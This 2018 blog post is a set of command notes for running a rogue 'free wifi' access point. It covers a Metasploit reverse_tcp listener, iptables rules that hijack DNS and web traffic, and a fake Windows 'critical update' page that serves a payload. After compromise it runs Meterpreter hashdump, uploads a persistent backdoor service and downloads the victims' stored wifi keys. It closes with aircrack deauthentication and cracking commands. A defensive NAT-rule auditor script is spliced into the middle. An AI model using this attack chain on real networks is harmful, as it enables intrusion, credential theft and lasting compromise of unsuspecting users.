Monday, May 28, 2018

Commands for fake AP

dhclient wlan0            //// Connect to the internet, can be eth0

*****Set up metasploit listener*********        ///// you need to create the meterpreter reverse_tcp connection --- information is available in many places  https://ift.tt/2ja8bNN
cd /
cd pentest
cd exploits
cd framework3
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 55555
show options
exploit

modprobe tun
airbase-ng -P -C 30 -e "free wifi" wlan1 -v   ////// can use various commands here

*************************
Transparent Airbase
*************************
su
***************
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1                         ////router address
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE         // wlan0 = route to the internet
/etc/init.d/dhcp3-server restart                                                      // backtrack users use dhcpd
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'                                           //webserver with fake update page


**********************************************************************
direct any request to apache
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1               //redirector
**********************************************************************
allow traffic again
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
**************************************************************************
**************************************************************************
**************************************************************************

NON Transparent Airbase
su
***************
modprobe tun
airbase-ng -P -C 30 -e "free wifi" wlan1 -v  

su
***************
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
/etc/init.d/dhcp3-server restart
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'

cd /                                                                       /// dnspoison available at https://ift.tt/2mCrsaA
cd home
cd hm
cd Desktop
cd dnspoison
java ServerKernelMain 10.0.0.1 10.0.0.1                                   
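The two NAT rules that both the transparent and non-transparent setups above rely on (a DNAT of every UDP packet, which reroutes all DNS, and a DNAT of all TCP port 80 to one local host) are exactly the patterns worth flagging when auditing a gateway or router you administer. The script below is an added example, not from the original notes: it parses `iptables-save -t nat` style output and reports PREROUTING DNAT rules that rewrite traffic without any destination or port restriction. The sample rules are constructed.

```python
"""Audit iptables-save style NAT rules for traffic-hijacking patterns.

Added example, not from the original notes. Parses the PREROUTING rules of
the nat table as printed by `iptables-save -t nat` and flags DNAT rules
that rewrite a whole protocol (all UDP, i.e. all DNS) or every web
destination (port 80/443) without restricting the original destination.
The sample rules below are constructed.
"""
import shlex
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class NatRule:
    chain: str
    proto: Optional[str] = None      # -p
    dport: Optional[str] = None      # --dport
    dst: Optional[str] = None        # -d (destination restriction)
    target: Optional[str] = None     # -j
    to: Optional[str] = None         # --to / --to-destination
    raw: str = ""


def parse_rule(line: str) -> Optional[NatRule]:
    """Parse one '-A CHAIN ...' line; returns None for table/chain/COMMIT lines."""
    tokens = shlex.split(line)
    if len(tokens) < 2 or tokens[0] != "-A":
        return None
    rule = NatRule(chain=tokens[1], raw=line.strip())
    i = 2
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if tok in ("-p", "--protocol"):
            rule.proto = nxt
        elif tok == "--dport":
            rule.dport = nxt
        elif tok in ("-d", "--destination"):
            rule.dst = nxt
        elif tok in ("-j", "--jump"):
            rule.target = nxt
        elif tok in ("--to", "--to-destination"):
            rule.to = nxt
        else:
            i += 1          # skip match modules (-m tcp), interfaces (-i/-o), etc.
            continue
        i += 2
    return rule


def audit_nat_rules(lines: List[str]) -> List[str]:
    """Return one human-readable finding per suspicious PREROUTING DNAT rule."""
    findings = []
    for line in lines:
        rule = parse_rule(line)
        if rule is None or rule.chain != "PREROUTING" or rule.target != "DNAT":
            continue
        if rule.dst is None and rule.dport is None:
            # Rewrites every packet of the protocol regardless of destination:
            # with -p udp this silently sends all DNS to the chosen resolver.
            findings.append(
                f"catch-all {rule.proto or 'any-protocol'} DNAT to {rule.to}: {rule.raw}")
        elif rule.dst is None and rule.dport in ("80", "443"):
            # Every web destination is steered to one host: a captive/redirect setup.
            findings.append(
                f"all {rule.proto} port {rule.dport} traffic rewritten to {rule.to}: {rule.raw}")
    return findings


# Constructed iptables-save output: two hijack-style rules and one ordinary
# port forward (restricted to a single public destination), which must not fire.
SAMPLE_RULES = [
    "*nat",
    ":PREROUTING ACCEPT [0:0]",
    ":POSTROUTING ACCEPT [0:0]",
    "-A PREROUTING -p udp -j DNAT --to-destination 192.168.1.1",
    "-A PREROUTING -p tcp -m tcp --dport 80 -j DNAT --to-destination 10.0.0.1",
    "-A PREROUTING -d 203.0.113.10/32 -p tcp -m tcp --dport 443 -j DNAT --to-destination 10.0.0.20:8443",
    "-A POSTROUTING -o wlan0 -j MASQUERADE",
    "COMMIT",
]

if __name__ == "__main__":
    for finding in audit_nat_rules(SAMPLE_RULES):
        print(finding)
```

Run it against `iptables-save -t nat` output from the host being audited; a legitimate transparent proxy will also match the port-80 check, so treat the findings as items to review rather than as proof of compromise.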

****************************************************************************


**** Check for victims ********
arp -n -v -i at0

sessions -l
sessions -i <session id>
sysinfo
getuid
use priv
hashdump


***download keys*****
mkdir c:\\windows\\wkviewer4
cd \
cd windows
cd wkviewer4
upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4                            ///wireless key viewer
upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4                            /// executes bat script... check below
upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4                 //meterpreter server
upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4                
upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4                        //meterpreter server
execute -H -f wkv.bat
cat wkv.txt
download wkv.txt /home/hm/Desktop/http/wkv.txt


misc......

wkv bat file =
wkv.exe /stabular wkv.txt
metsvc.exe install-service


Index html -

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://ift.tt/kkyg93">
<html xmlns="https://ift.tt/lH0Osb">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style2 {
    font-family: Arial, Helvetica, sans-serif;
    font-weight: bold;
    font-size: 24px;
    color: #999999;
}
.style3 {
    font-family: Arial, Helvetica, sans-serif;
    color: #666666;
    font-weight: bold;
}
.style4 {
    font-family: Arial, Helvetica, sans-serif;
    color: #666666;
    font-weight: bold;
    font-size: 24px;
}
-->
</style>
<script src="/AC_RunActiveContent.js" type="text/javascript"></script>
</head>

<body>
<p><img src="/udntitled.jpg" alt="t" width="1275" height="88" /></p>
<p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">


</p>
<p align="center" class="style2"></p>
<p>&nbsp;</p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
  <label for="D"></label>
</form>
<p align="left" class="style4">&nbsp;</p>
</body>
</html>

####################

ifconfig rausb0 up
airodump-ng -w capture -c 6 rausb0

aireplay-ng -0 10 -a <mac access point> -c <mac client> rausb0
-0 -> deauthentication attack

aireplay-ng -3 -b <mac access point> -h <mac client> rausb0
-3 -> ARP request replay

aircrack-ng capture02.cap

##################
aircrack-ng -a 2 filename.cap -w wordlist.lst -b AP:MA:CG:OE:SH:ERE
Note: you must capture full .cap files with airodump-ng (that is, without the --ivs option), not just IVs.

------------------
Have you tried to manually connect to your AP?

iwconfig eth0 essid <whatever your ssid is>
iwconfig eth0 channel <whatever channel your AP is on>
iwconfig eth0 key <whatever the key is> (if you have WEP turned on)
ifconfig eth0 up

Try that, give it a minute or 2 and then run iwconfig again and post your results.
##################



